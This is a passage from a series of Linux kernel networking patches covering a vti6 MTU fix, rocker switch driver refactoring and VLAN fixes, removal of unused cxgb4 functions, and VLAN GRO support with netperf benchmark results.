ping that don't check for this. So add pmtu handling to vti6_xmit to report MTU changes immediately. Signed-off-by: Steffen Klassert Signed-off-by: Alexander Duyck Signed-off-by: David S. Miller --- net/ipv6/ip6_vti.c | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/net/ipv6/ip6_vti.c b/net/ipv6/ip6_vti.c index ff3bd863fa03..0224c032dca5 100644 --- a/net/ipv6/ip6_vti.c +++ b/net/ipv6/ip6_vti.c @@ -435,6 +435,7 @@ vti6_xmit(struct sk_buff *skb, struct net_device *dev, struct flowi *fl) struct net_device *tdev; struct xfrm_state *x; int err = -1; + int mtu; if (!dst) goto tx_err_link_failure; @@ -468,6 +469,19 @@ vti6_xmit(struct sk_buff *skb, struct net_device *dev, struct flowi *fl) skb_dst_set(skb, dst); skb->dev = skb_dst(skb)->dev; + mtu = dst_mtu(dst); + if (!skb->ignore_df && skb->len > mtu) { + skb_dst(skb)->ops->update_pmtu(dst, NULL, skb, mtu); + + if (skb->protocol == htons(ETH_P_IPV6)) + icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, mtu); + else + icmp_send(skb, ICMP_DEST_UNREACH, ICMP_FRAG_NEEDED, + htonl(mtu)); + + return -EMSGSIZE; + } + err = dst_output(skb); if (net_xmit_eval(err) == 0) { struct pcpu_sw_netstats *tstats = this_cpu_ptr(dev->tstats); From 534ba6a87d46733b896baa741e8e2f7e722d27c5 Mon Sep 17 00:00:00 2001 From: Simon Horman Date: Mon, 1 Jun 2015 13:25:04 +0900 Subject: [PATCH 567/872] rocker: remove rocker parameter from functions that have rocker_port parameter The rocker (switch) of a rocker_port may be trivially obtained from the latter it seems cleaner not to pass the former to a function when the latter is being passed anyway. rocker_port_rx_proc() is omitted from this change as it is a hot path case. Signed-off-by: Simon Horman Acked-by: Scott Feldman Acked-by: Andy Gospodarek Signed-off-by: David S. 
Miller --- drivers/net/ethernet/rocker/rocker.c | 115 +++++++++++---------------- 1 file changed, 45 insertions(+), 70 deletions(-) diff --git a/drivers/net/ethernet/rocker/rocker.c b/drivers/net/ethernet/rocker/rocker.c index 36f7edfc3c7a..d246647b3653 100644 --- a/drivers/net/ethernet/rocker/rocker.c +++ b/drivers/net/ethernet/rocker/rocker.c @@ -1172,11 +1172,11 @@ static void rocker_dma_rings_fini(struct rocker *rocker) rocker_dma_ring_destroy(rocker, &rocker->cmd_ring); } -static int rocker_dma_rx_ring_skb_map(const struct rocker *rocker, - const struct rocker_port *rocker_port, +static int rocker_dma_rx_ring_skb_map(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, struct sk_buff *skb, size_t buf_len) { + const struct rocker *rocker = rocker_port->rocker; struct pci_dev *pdev = rocker->pdev; dma_addr_t dma_handle; @@ -1201,8 +1201,7 @@ static size_t rocker_port_rx_buf_len(const struct rocker_port *rocker_port) return rocker_port->dev->mtu + ETH_HLEN + ETH_FCS_LEN + VLAN_HLEN; } -static int rocker_dma_rx_ring_skb_alloc(const struct rocker *rocker, - const struct rocker_port *rocker_port, +static int rocker_dma_rx_ring_skb_alloc(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info) { struct net_device *dev = rocker_port->dev; @@ -1219,8 +1218,7 @@ static int rocker_dma_rx_ring_skb_alloc(const struct rocker *rocker, skb = netdev_alloc_skb_ip_align(dev, buf_len); if (!skb) return -ENOMEM; - err = rocker_dma_rx_ring_skb_map(rocker, rocker_port, desc_info, - skb, buf_len); + err = rocker_dma_rx_ring_skb_map(rocker_port, desc_info, skb, buf_len); if (err) { dev_kfree_skb_any(skb); return err; @@ -1257,15 +1255,15 @@ static void rocker_dma_rx_ring_skb_free(const struct rocker *rocker, dev_kfree_skb_any(skb); } -static int rocker_dma_rx_ring_skbs_alloc(const struct rocker *rocker, - const struct rocker_port *rocker_port) +static int rocker_dma_rx_ring_skbs_alloc(const struct rocker_port *rocker_port) { const struct rocker_dma_ring_info *rx_ring = &rocker_port->rx_ring; + const struct rocker *rocker = rocker_port->rocker; int i; int err; for (i = 0; i < rx_ring->size; i++) { - err = rocker_dma_rx_ring_skb_alloc(rocker, rocker_port, + err = rocker_dma_rx_ring_skb_alloc(rocker_port, &rx_ring->desc_info[i]); if (err) goto rollback; @@ -1278,10 +1276,10 @@ static int rocker_dma_rx_ring_skbs_alloc(const struct rocker *rocker, return err; } -static void rocker_dma_rx_ring_skbs_free(const struct rocker *rocker, - const struct rocker_port *rocker_port) +static void rocker_dma_rx_ring_skbs_free(const struct rocker_port *rocker_port) { const struct rocker_dma_ring_info *rx_ring = &rocker_port->rx_ring; + const struct rocker *rocker = rocker_port->rocker; int i; for (i = 0; i < rx_ring->size; i++) @@ -1327,7 +1325,7 @@ static int rocker_port_dma_rings_init(struct rocker_port *rocker_port) goto err_dma_rx_ring_bufs_alloc; } - err = rocker_dma_rx_ring_skbs_alloc(rocker, rocker_port); + err = rocker_dma_rx_ring_skbs_alloc(rocker_port); if (err) { netdev_err(rocker_port->dev, "failed to alloc rx dma ring skbs\n"); goto err_dma_rx_ring_skbs_alloc; @@ -1353,7 +1351,7 @@ static void rocker_port_dma_rings_fini(struct rocker_port *rocker_port) { struct rocker *rocker = rocker_port->rocker; - rocker_dma_rx_ring_skbs_free(rocker, rocker_port); + rocker_dma_rx_ring_skbs_free(rocker_port); rocker_dma_ring_bufs_free(rocker, &rocker_port->rx_ring, PCI_DMA_BIDIRECTIONAL); rocker_dma_ring_destroy(rocker, &rocker_port->rx_ring); @@ -1588,22 +1586,20 @@ static irqreturn_t 
rocker_rx_irq_handler(int irq, void *dev_id) * Command interface ********************/ -typedef int (*rocker_cmd_prep_cb_t)(const struct rocker *rocker, - const struct rocker_port *rocker_port, +typedef int (*rocker_cmd_prep_cb_t)(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv); -typedef int (*rocker_cmd_proc_cb_t)(const struct rocker *rocker, - const struct rocker_port *rocker_port, +typedef int (*rocker_cmd_proc_cb_t)(const struct rocker_port *rocker_port, const struct rocker_desc_info *desc_info, void *priv); -static int rocker_cmd_exec(struct rocker *rocker, - struct rocker_port *rocker_port, +static int rocker_cmd_exec(struct rocker_port *rocker_port, enum switchdev_trans trans, rocker_cmd_prep_cb_t prepare, void *prepare_priv, rocker_cmd_proc_cb_t process, void *process_priv) { + struct rocker *rocker = rocker_port->rocker; struct rocker_desc_info *desc_info; struct rocker_wait *wait; unsigned long flags; @@ -1622,7 +1618,7 @@ static int rocker_cmd_exec(struct rocker *rocker, goto out; } - err = prepare(rocker, rocker_port, desc_info, prepare_priv); + err = prepare(rocker_port, desc_info, prepare_priv); if (err) { spin_unlock_irqrestore(&rocker->cmd_ring_lock, flags); goto out; @@ -1644,7 +1640,7 @@ static int rocker_cmd_exec(struct rocker *rocker, return err; if (process) - err = process(rocker, rocker_port, desc_info, process_priv); + err = process(rocker_port, desc_info, process_priv); rocker_desc_gen_clear(desc_info); out: @@ -1653,8 +1649,7 @@ static int rocker_cmd_exec(struct rocker *rocker, } static int -rocker_cmd_get_port_settings_prep(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_get_port_settings_prep(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -1674,8 +1669,7 @@ rocker_cmd_get_port_settings_prep(const struct rocker *rocker, } static int -rocker_cmd_get_port_settings_ethtool_proc(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_get_port_settings_ethtool_proc(const struct rocker_port *rocker_port, const struct rocker_desc_info *desc_info, void *priv) { @@ -1713,8 +1707,7 @@ rocker_cmd_get_port_settings_ethtool_proc(const struct rocker *rocker, } static int -rocker_cmd_get_port_settings_macaddr_proc(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_get_port_settings_macaddr_proc(const struct rocker_port *rocker_port, const struct rocker_desc_info *desc_info, void *priv) { @@ -1746,8 +1739,7 @@ struct port_name { }; static int -rocker_cmd_get_port_settings_phys_name_proc(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_get_port_settings_phys_name_proc(const struct rocker_port *rocker_port, const struct rocker_desc_info *desc_info, void *priv) { @@ -1788,8 +1780,7 @@ rocker_cmd_get_port_settings_phys_name_proc(const struct rocker *rocker, } static int -rocker_cmd_set_port_settings_ethtool_prep(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_set_port_settings_ethtool_prep(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -1819,8 +1810,7 @@ rocker_cmd_set_port_settings_ethtool_prep(const struct rocker *rocker, } static int -rocker_cmd_set_port_settings_macaddr_prep(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_set_port_settings_macaddr_prep(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -1844,8 +1834,7 @@ 
rocker_cmd_set_port_settings_macaddr_prep(const struct rocker *rocker, } static int -rocker_cmd_set_port_learning_prep(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_set_port_learning_prep(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -1870,8 +1859,7 @@ rocker_cmd_set_port_learning_prep(const struct rocker *rocker, static int rocker_cmd_get_port_settings_ethtool(struct rocker_port *rocker_port, struct ethtool_cmd *ecmd) { - return rocker_cmd_exec(rocker_port->rocker, rocker_port, - SWITCHDEV_TRANS_NONE, + return rocker_cmd_exec(rocker_port, SWITCHDEV_TRANS_NONE, rocker_cmd_get_port_settings_prep, NULL, rocker_cmd_get_port_settings_ethtool_proc, ecmd); @@ -1880,8 +1868,7 @@ static int rocker_cmd_get_port_settings_ethtool(struct rocker_port *rocker_port, static int rocker_cmd_get_port_settings_macaddr(struct rocker_port *rocker_port, unsigned char *macaddr) { - return rocker_cmd_exec(rocker_port->rocker, rocker_port, - SWITCHDEV_TRANS_NONE, + return rocker_cmd_exec(rocker_port, SWITCHDEV_TRANS_NONE, rocker_cmd_get_port_settings_prep, NULL, rocker_cmd_get_port_settings_macaddr_proc, macaddr); @@ -1890,8 +1877,7 @@ static int rocker_cmd_get_port_settings_macaddr(struct rocker_port *rocker_port, static int rocker_cmd_set_port_settings_ethtool(struct rocker_port *rocker_port, struct ethtool_cmd *ecmd) { - return rocker_cmd_exec(rocker_port->rocker, rocker_port, - SWITCHDEV_TRANS_NONE, + return rocker_cmd_exec(rocker_port, SWITCHDEV_TRANS_NONE, rocker_cmd_set_port_settings_ethtool_prep, ecmd, NULL, NULL); } @@ -1899,8 +1885,7 @@ static int rocker_cmd_set_port_settings_ethtool(struct rocker_port *rocker_port, static int rocker_cmd_set_port_settings_macaddr(struct rocker_port *rocker_port, unsigned char *macaddr) { - return rocker_cmd_exec(rocker_port->rocker, rocker_port, - SWITCHDEV_TRANS_NONE, + return rocker_cmd_exec(rocker_port, SWITCHDEV_TRANS_NONE, rocker_cmd_set_port_settings_macaddr_prep, macaddr, NULL, NULL); } @@ -1908,7 +1893,7 @@ static int rocker_cmd_set_port_settings_macaddr(struct rocker_port *rocker_port, static int rocker_port_set_learning(struct rocker_port *rocker_port, enum switchdev_trans trans) { - return rocker_cmd_exec(rocker_port->rocker, rocker_port, trans, + return rocker_cmd_exec(rocker_port, trans, rocker_cmd_set_port_learning_prep, NULL, NULL, NULL); } @@ -2114,8 +2099,7 @@ rocker_cmd_flow_tbl_add_acl(struct rocker_desc_info *desc_info, return 0; } -static int rocker_cmd_flow_tbl_add(const struct rocker *rocker, - const struct rocker_port *rocker_port, +static int rocker_cmd_flow_tbl_add(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -2172,8 +2156,7 @@ static int rocker_cmd_flow_tbl_add(const struct rocker *rocker, return 0; } -static int rocker_cmd_flow_tbl_del(const struct rocker *rocker, - const struct rocker_port *rocker_port, +static int rocker_cmd_flow_tbl_del(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -2282,8 +2265,7 @@ rocker_cmd_group_tbl_add_l3_unicast(struct rocker_desc_info *desc_info, return 0; } -static int rocker_cmd_group_tbl_add(const struct rocker *rocker, - const struct rocker_port *rocker_port, +static int rocker_cmd_group_tbl_add(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -2328,8 +2310,7 @@ static int rocker_cmd_group_tbl_add(const struct rocker *rocker, return 0; } -static int rocker_cmd_group_tbl_del(const struct rocker 
*rocker, - const struct rocker_port *rocker_port, +static int rocker_cmd_group_tbl_del(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -2460,8 +2441,7 @@ static int rocker_flow_tbl_add(struct rocker_port *rocker_port, spin_unlock_irqrestore(&rocker->flow_tbl_lock, flags); - return rocker_cmd_exec(rocker, rocker_port, trans, - rocker_cmd_flow_tbl_add, + return rocker_cmd_exec(rocker_port, trans, rocker_cmd_flow_tbl_add, found, NULL, NULL); } @@ -2492,7 +2472,7 @@ static int rocker_flow_tbl_del(struct rocker_port *rocker_port, rocker_port_kfree(trans, match); if (found) { - err = rocker_cmd_exec(rocker, rocker_port, trans, + err = rocker_cmd_exec(rocker_port, trans, rocker_cmd_flow_tbl_del, found, NULL, NULL); rocker_port_kfree(trans, found); @@ -2782,8 +2762,7 @@ static int rocker_group_tbl_add(struct rocker_port *rocker_port, spin_unlock_irqrestore(&rocker->group_tbl_lock, flags); - return rocker_cmd_exec(rocker, rocker_port, trans, - rocker_cmd_group_tbl_add, + return rocker_cmd_exec(rocker_port, trans, rocker_cmd_group_tbl_add, found, NULL, NULL); } @@ -2811,7 +2790,7 @@ static int rocker_group_tbl_del(struct rocker_port *rocker_port, rocker_group_tbl_entry_free(trans, match); if (found) { - err = rocker_cmd_exec(rocker, rocker_port, trans, + err = rocker_cmd_exec(rocker_port, trans, rocker_cmd_group_tbl_del, found, NULL, NULL); rocker_group_tbl_entry_free(trans, found); @@ -4219,8 +4198,7 @@ static int rocker_port_get_phys_port_name(struct net_device *dev, struct port_name name = { .buf = buf, .len = len }; int err; - err = rocker_cmd_exec(rocker_port->rocker, rocker_port, - SWITCHDEV_TRANS_NONE, + err = rocker_cmd_exec(rocker_port, SWITCHDEV_TRANS_NONE, rocker_cmd_get_port_settings_prep, NULL, rocker_cmd_get_port_settings_phys_name_proc, &name); @@ -4600,8 +4578,7 @@ static void rocker_port_get_strings(struct net_device *netdev, u32 stringset, } static int -rocker_cmd_get_port_stats_prep(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_get_port_stats_prep(const struct rocker_port *rocker_port, struct rocker_desc_info *desc_info, void *priv) { @@ -4625,8 +4602,7 @@ rocker_cmd_get_port_stats_prep(const struct rocker *rocker, } static int -rocker_cmd_get_port_stats_ethtool_proc(const struct rocker *rocker, - const struct rocker_port *rocker_port, +rocker_cmd_get_port_stats_ethtool_proc(const struct rocker_port *rocker_port, const struct rocker_desc_info *desc_info, void *priv) { @@ -4666,8 +4642,7 @@ rocker_cmd_get_port_stats_ethtool_proc(const struct rocker *rocker, static int rocker_cmd_get_port_stats_ethtool(struct rocker_port *rocker_port, void *priv) { - return rocker_cmd_exec(rocker_port->rocker, rocker_port, - SWITCHDEV_TRANS_NONE, + return rocker_cmd_exec(rocker_port, SWITCHDEV_TRANS_NONE, rocker_cmd_get_port_stats_prep, NULL, rocker_cmd_get_port_stats_ethtool_proc, priv); @@ -4780,7 +4755,7 @@ static int rocker_port_rx_proc(const struct rocker *rocker, netif_receive_skb(skb); - return rocker_dma_rx_ring_skb_alloc(rocker, rocker_port, desc_info); + return rocker_dma_rx_ring_skb_alloc(rocker_port, desc_info); } static struct rocker_port *rocker_port_napi_rx_get(struct napi_struct *napi) @@ -4858,9 +4833,9 @@ static void rocker_remove_ports(const struct rocker *rocker) kfree(rocker->ports); } -static void rocker_port_dev_addr_init(const struct rocker *rocker, - struct rocker_port *rocker_port) +static void rocker_port_dev_addr_init(struct rocker_port *rocker_port) { + const struct rocker *rocker = 
rocker_port->rocker; const struct pci_dev *pdev = rocker->pdev; int err; @@ -4890,7 +4865,7 @@ static int rocker_probe_port(struct rocker *rocker, unsigned int port_number) rocker_port->brport_flags = BR_LEARNING | BR_LEARNING_SYNC; INIT_LIST_HEAD(&rocker_port->trans_mem); - rocker_port_dev_addr_init(rocker, rocker_port); + rocker_port_dev_addr_init(rocker_port); dev->netdev_ops = &rocker_port_netdev_ops; dev->ethtool_ops = &rocker_port_ethtool_ops; dev->switchdev_ops = &rocker_port_switchdev_ops; From 661b689bbd2e9392c3d9935e791af75ddbc455dc Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Mon, 1 Jun 2015 20:07:41 +0530 Subject: [PATCH 568/872] cxgb4: remove unused fn to enable/disable db coalescing Remove unused function cxgb4_enable_db_coalescing() and cxgb4_disable_db_coalescing() Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 19 ------------------- .../net/ethernet/chelsio/cxgb4/cxgb4_uld.h | 2 -- 2 files changed, 21 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index 4f69b5237129..974b27ce6a70 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -2069,25 +2069,6 @@ int cxgb4_sync_txq_pidx(struct net_device *dev, u16 qid, u16 pidx, } EXPORT_SYMBOL(cxgb4_sync_txq_pidx); -void cxgb4_disable_db_coalescing(struct net_device *dev) -{ - struct adapter *adap; - - adap = netdev2adap(dev); - t4_set_reg_field(adap, SGE_DOORBELL_CONTROL_A, NOCOALESCE_F, - NOCOALESCE_F); -} -EXPORT_SYMBOL(cxgb4_disable_db_coalescing); - -void cxgb4_enable_db_coalescing(struct net_device *dev) -{ - struct adapter *adap; - - adap = netdev2adap(dev); - t4_set_reg_field(adap, SGE_DOORBELL_CONTROL_A, NOCOALESCE_F, 0); -} -EXPORT_SYMBOL(cxgb4_enable_db_coalescing); - int cxgb4_read_tpte(struct net_device *dev, u32 stag, __be32 *tpte) { struct adapter *adap; diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.h index df34293f35e8..14e8110b5dbb 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_uld.h @@ -298,8 +298,6 @@ struct sk_buff *cxgb4_pktgl_to_skb(const struct pkt_gl *gl, unsigned int skb_len, unsigned int pull_len); int cxgb4_sync_txq_pidx(struct net_device *dev, u16 qid, u16 pidx, u16 size); int cxgb4_flush_eq_cache(struct net_device *dev); -void cxgb4_disable_db_coalescing(struct net_device *dev); -void cxgb4_enable_db_coalescing(struct net_device *dev); int cxgb4_read_tpte(struct net_device *dev, u32 stag, __be32 *tpte); u64 cxgb4_read_sge_timestamp(struct net_device *dev); From 66e5133f19e901a044fa5eaeeb6ecff4545839e5 Mon Sep 17 00:00:00 2001 From: Toshiaki Makita Date: Mon, 1 Jun 2015 21:55:06 +0900 Subject: [PATCH 569/872] vlan: Add GRO support for non hardware accelerated vlan Currently packets with non-hardware-accelerated vlan cannot be handled by GRO. This causes low performance for 802.1ad and stacked vlan, as their vlan tags are currently not stripped by hardware. This patch adds GRO support for non-hardware-accelerated vlan and improves receive performance of them. Test Environment: vlan device (.1Q) on vlan device (.1ad) on ixgbe (82599) Result: - Before $ netperf -t TCP_STREAM -H 192.168.20.2 -l 60 Recv Send Send Socket Socket Message Elapsed Size Size Size Time Throughput bytes bytes bytes secs. 
10^6bits/sec 87380 16384 16384 60.00 5233.17 Rx side CPU usage: %usr %sys %irq %soft %idle 0.27 58.03 0.00 41.70 0.00 - After $ netperf -t TCP_STREAM -H 192.168.20.2 -l 60 Recv Send Send Socket Socket Message Elapsed Size Size Size Time Throughput bytes bytes bytes secs. 10^6bits/sec 87380 16384 16384 60.00 7586.85 Rx side CPU usage: %usr %sys %irq %soft %idle 0.50 25.83 0.00 59.53 14.14 [ Register VLAN offloads with priority 10 -DaveM ] Signed-off-by: Toshiaki Makita Signed-off-by: David S. Miller --- include/linux/if_vlan.h | 20 +++++++++ net/8021q/vlan.c | 96 +++++++++++++++++++++++++++++++++++++++++ 2 files changed, 116 insertions(+) diff --git a/include/linux/if_vlan.h b/include/linux/if_vlan.h index a40d29846ac2..67ce5bd3b56a 100644 --- a/include/linux/if_vlan.h +++ b/include/linux/if_vlan.h @@ -628,4 +628,24 @@ static inline netdev_features_t vlan_features_check(const struct sk_buff *skb, return features; } +/** + * compare_vlan_header - Compare two vlan headers + * @h1: Pointer to vlan header + * @h2: Pointer to vlan header + * + * Compare two vlan headers, returns 0 if equal. + * + * Please note that alignment of h1 & h2 are only guaranteed to be 16 bits. + */ +static inline unsigned long compare_vlan_header(const struct vlan_hdr *h1, + const struct vlan_hdr *h2) +{ +#if defined(CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS) + return *(u32 *)h1 ^ *(u32 *)h2; +#else + return ((__force u32)h1->h_vlan_TCI ^ (__force u32)h2->h_vlan_TCI) | + ((__force u32)h1->h_vlan_encapsulated_proto ^ + (__force u32)h2->h_vlan_encapsulated_proto); +#endif +} #endif /* !(_LINUX_IF_VLAN_H_) */ diff --git a/net/8021q/vlan.c b/net/8021q/vlan.c index 59555f0f8fc8..d2cd9de4b724 100644 --- a/net/8021q/vlan.c +++ b/net/8021q/vlan.c @@ -618,6 +618,92 @@ static int vlan_ioctl_handler(struct net *net, void __user *arg) return err; } +static struct sk_buff **vlan_gro_receive(struct sk_buff **head, + struct sk_buff *skb) +{ + struct sk_buff *p, **pp = NULL; + struct vlan_hdr *vhdr; + unsigned int hlen, off_vlan; + const struct packet_offload *ptype; + __be16 type; + int flush = 1; + + off_vlan = skb_gro_offset(skb); + hlen = off_vlan + sizeof(*vhdr); + vhdr = skb_gro_header_fast(skb, off_vlan); + if (skb_gro_header_hard(skb, hlen)) { + vhdr = skb_gro_header_slow(skb, hlen, off_vlan); + if (unlikely(!vhdr)) + goto out; + } + + type = vhdr->h_vlan_encapsulated_proto; + + rcu_read_lock(); + ptype = gro_find_receive_by_type(type); + if (!ptype) + goto out_unlock; + + flush = 0; + + for (p = *head; p; p = p->next) { + struct vlan_hdr *vhdr2; + + if (!NAPI_GRO_CB(p)->same_flow) + continue; + + vhdr2 = (struct vlan_hdr *)(p->data + off_vlan); + if (compare_vlan_header(vhdr, vhdr2)) + NAPI_GRO_CB(p)->same_flow = 0; + } + + skb_gro_pull(skb, sizeof(*vhdr)); + skb_gro_postpull_rcsum(skb, vhdr, sizeof(*vhdr)); + pp = ptype->callbacks.gro_receive(head, skb); + +out_unlock: + rcu_read_unlock(); +out: + NAPI_GRO_CB(skb)->flush |= flush; + + return pp; +} + +static int vlan_gro_complete(struct sk_buff *skb, int nhoff) +{ + struct vlan_hdr *vhdr = (struct vlan_hdr *)(skb->data + nhoff); + __be16 type = vhdr->h_vlan_encapsulated_proto; + struct packet_offload *ptype; + int err = -ENOENT; + + rcu_read_lock(); + ptype = gro_find_complete_by_type(type); + if (ptype) + err = ptype->callbacks.gro_complete(skb, nhoff + sizeof(*vhdr)); + + rcu_read_unlock(); + return err; +} + +static struct packet_offload vlan_packet_offloads[] __read_mostly = { + { + .type = cpu_to_be16(ETH_P_8021Q), + .priority = 10, + .callbacks = { + .gro_receive = 
vlan_gro_receive, + .gro_complete = vlan_gro_complete, + }, + }, + { + .type = cpu_to_be16(ETH_P_8021AD), + .priority = 10, + .callbacks = { + .gro_receive = vlan_gro_receive, + .gro_complete = vlan_gro_complete, + }, + }, +}; + static int __net_init vlan_init_net(struct net *net) { struct vlan_net *vn = net_generic(net, vlan_net_id); @@ -645,6 +731,7 @@ static struct pernet_operations vlan_net_ops = { static int __init vlan_proto_init(void) { int err; + unsigned int i; pr_info("%s v%s\n", vlan_fullname, vlan_version); @@ -668,6 +755,9 @@ static int __init vlan_proto_init(void) if (err < 0) goto err5; + for (i = 0; i < ARRAY_SIZE(vlan_packet_offloads); i++) + dev_add_offload(&vlan_packet_offloads[i]); + vlan_ioctl_set(vlan_ioctl_handler); return 0; @@ -685,7 +775,13 @@ static int __init vlan_proto_init(void) static void __exit vlan_cleanup_module(void) { + unsigned int i; + vlan_ioctl_set(NULL); + + for (i = 0; i < ARRAY_SIZE(vlan_packet_offloads); i++) + dev_remove_offload(&vlan_packet_offloads[i]); + vlan_netlink_fini(); unregister_netdevice_notifier(&vlan_notifier_block); From 27b808cbc2ad72608fb2fd9abd81930d32464546 Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Mon, 1 Jun 2015 11:39:02 -0700 Subject: [PATCH 570/872] rocker: zero allocate ports array When allocating the array of rocker port pointers, zero the array values so we can test for !NULL to see if port is allocated/registered. We'll need this later when installing untagged VLAN support for each port, during port probe. It's a long story, but to install a VLAN (vid=0 for untagged, in this case) on a port, we'll need to scan other ports to see if the VLAN group for that VLAN has been setup. To scan the other ports, we need to walk the port array. Signed-off-by: Scott Feldman Signed-off-by: David S. Miller --- drivers/net/ethernet/rocker/rocker.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/rocker/rocker.c b/drivers/net/ethernet/rocker/rocker.c index d246647b3653..b0fb24509124 100644 --- a/drivers/net/ethernet/rocker/rocker.c +++ b/drivers/net/ethernet/rocker/rocker.c @@ -4911,7 +4911,7 @@ static int rocker_probe_ports(struct rocker *rocker) int err; alloc_size = sizeof(struct rocker_port *) * rocker->port_count; - rocker->ports = kmalloc(alloc_size, GFP_KERNEL); + rocker->ports = kzalloc(alloc_size, GFP_KERNEL); if (!rocker->ports) return -ENOMEM; for (i = 0; i < rocker->port_count; i++) { From cec04a60bcd72ce43618ca62da5e0f508e694703 Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Mon, 1 Jun 2015 11:39:03 -0700 Subject: [PATCH 571/872] rocker: cleanup vlan table on error adding vlan Basic house keeping: If there is an error adding the router MAC for this vlan, removing the just installed VLAN table entry to leave device in same state as before failure. Signed-off-by: Scott Feldman Signed-off-by: David S. 
Miller --- drivers/net/ethernet/rocker/rocker.c | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/drivers/net/ethernet/rocker/rocker.c b/drivers/net/ethernet/rocker/rocker.c index b0fb24509124..bba9557372a7 100644 --- a/drivers/net/ethernet/rocker/rocker.c +++ b/drivers/net/ethernet/rocker/rocker.c @@ -4320,7 +4320,12 @@ static int rocker_port_vlan_add(struct rocker_port *rocker_port, if (err) return err; - return rocker_port_router_mac(rocker_port, trans, 0, htons(vid)); + err = rocker_port_router_mac(rocker_port, trans, 0, htons(vid)); + if (err) + rocker_port_vlan(rocker_port, trans, + ROCKER_OP_FLAG_REMOVE, vid); + + return err; } static int rocker_port_vlans_add(struct rocker_port *rocker_port, From bcfd780144371fa0156176fa5518d4dabcd5aab9 Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Mon, 1 Jun 2015 11:39:04 -0700 Subject: [PATCH 572/872] rocker: install untagged VLAN (vid=0) support for each port On port probe, install by default untagged VLAN support. This is equivalent to running the command: bridge vlan add vid 0 dev DEV self A user could, if they wanted, manaully removing untagged support from the port by running the command: bridge vlan del vid 0 dev DEV self But installing it by default on port initialization gives the normal expected behavior. Signed-off-by: Scott Feldman Signed-off-by: David S. Miller --- drivers/net/ethernet/rocker/rocker.c | 20 +++++++++++++++++--- 1 file changed, 17 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/rocker/rocker.c b/drivers/net/ethernet/rocker/rocker.c index bba9557372a7..076f3f29fe5c 100644 --- a/drivers/net/ethernet/rocker/rocker.c +++ b/drivers/net/ethernet/rocker/rocker.c @@ -3136,6 +3136,8 @@ static int rocker_port_vlan_flood_group(struct rocker_port *rocker_port, for (i = 0; i < rocker->port_count; i++) { p = rocker->ports[i]; + if (!p) + continue; if (!rocker_port_is_bridged(p)) continue; if (test_bit(ntohs(vlan_id), p->vlan_bitmap)) { @@ -3195,7 +3197,7 @@ static int rocker_port_vlan_l2_groups(struct rocker_port *rocker_port, for (i = 0; i < rocker->port_count; i++) { p = rocker->ports[i]; - if (test_bit(ntohs(vlan_id), p->vlan_bitmap)) + if (p && test_bit(ntohs(vlan_id), p->vlan_bitmap)) ref++; } @@ -4857,6 +4859,7 @@ static int rocker_probe_port(struct rocker *rocker, unsigned int port_number) const struct pci_dev *pdev = rocker->pdev; struct rocker_port *rocker_port; struct net_device *dev; + u16 untagged_vid = 0; int err; dev = alloc_etherdev(sizeof(struct rocker_port)); @@ -4892,16 +4895,27 @@ static int rocker_probe_port(struct rocker *rocker, unsigned int port_number) rocker_port_set_learning(rocker_port, SWITCHDEV_TRANS_NONE); - rocker_port->internal_vlan_id = - rocker_port_internal_vlan_id_get(rocker_port, dev->ifindex); err = rocker_port_ig_tbl(rocker_port, SWITCHDEV_TRANS_NONE, 0); if (err) { dev_err(&pdev->dev, "install ig port table failed\n"); goto err_port_ig_tbl; } + rocker_port->internal_vlan_id = + rocker_port_internal_vlan_id_get(rocker_port, dev->ifindex); + + err = rocker_port_vlan_add(rocker_port, SWITCHDEV_TRANS_NONE, + untagged_vid, 0); + if (err) { + netdev_err(rocker_port->dev, "install untagged VLAN failed\n"); + goto err_untagged_vlan; + } + return 0; +err_untagged_vlan: + rocker_port_ig_tbl(rocker_port, SWITCHDEV_TRANS_NONE, + ROCKER_OP_FLAG_REMOVE); err_port_ig_tbl: unregister_netdev(dev); err_register_netdev: From 027e00dc0bc7049e66124a3943efa9defa5cd835 